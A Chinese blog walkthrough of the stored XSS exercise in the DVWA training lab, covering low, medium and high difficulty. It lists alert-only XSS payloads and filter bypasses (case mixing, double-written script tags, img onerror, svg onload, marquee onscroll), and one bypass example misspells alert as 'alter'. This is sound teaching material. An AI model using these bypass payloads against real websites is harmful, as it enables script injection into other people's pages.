dvwa靶场xss储存型

xxs储存型

攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。产生层面:后端漏洞特征:持久性的、前端执行、储存在后端数据库
存储型XSS数据交互过程:用户输入数据->后端执行php代码->存入数据库某张表->返回数据给php页面->回显前端
不需要访问指定链接,访问到存在恶意代码的网页会自动弹出

low

没有任何过滤
xss常用语句

<script>alert(/xss/)</script>

message框插入恶意代码

在这里插入图片描述
上传后刷新页面就会自动弹出在这里插入图片描述

name栏插入恶意代码

会发现无法对长度做了限制将maxlenth手动更改至能插入恶意代码的长度
在这里插入图片描述相同插入上述代码进行刷新页面也可以

medium

本关对message参数进行了编码导致无法执行代码,还对name参数的

绕过方法

大小写绕过

<script>alter(/xss/)</script>

双写绕过

<sc<script>ript>alert(/xss/)</script>

插入方法和low等级,没什么区别
在这里插入图片描述

high

<img src=1 onerror=alert(1)>
<iMg src=1 oNeRrOr=alert(1)>
<ImG src=1 OnErRoR=alert(1)>
<svg onload=alert(1)>
<sVg OnLoAd=alert(1)>
<SvG oNlOaD=alert(1)>
<svg/onload=alert(1)>
<sVg/OnLoAd=alert(1)>
<SvG/oNlOaD=alert(1)>
<marquee onscroll=alert(1)>
<mArQuEe OnScRoLl=alert(1)>
<MaRqUeE oNsCrOlL=alert(1)>

成了
在这里插入图片描述

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2024-01-31 08:28:01       19 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-31 08:28:01       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-01-31 08:28:01       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-01-31 08:28:01       20 阅读

热门阅读

  1. 分布式集群如何保证线程安全

    2024-01-31 08:28:01       30 阅读
  2. 贪吃蛇游戏中显示贪吃蛇的路线和蛇的宽度

    2024-01-31 08:28:01       32 阅读
  3. Maltab 输出矢量图

    2024-01-31 08:28:01       36 阅读
  4. CSS transition(过渡效果)详解

    2024-01-31 08:28:01       33 阅读
  5. 如何发布自己的npm包

    2024-01-31 08:28:01       42 阅读
  6. 后端课程接口

    2024-01-31 08:28:01       31 阅读
  7. ARM与X86架构的区别与联系

    2024-01-31 08:28:01       33 阅读
  8. MySQL 函数参考手册(MySQL 高级函数)

    2024-01-31 08:28:01       22 阅读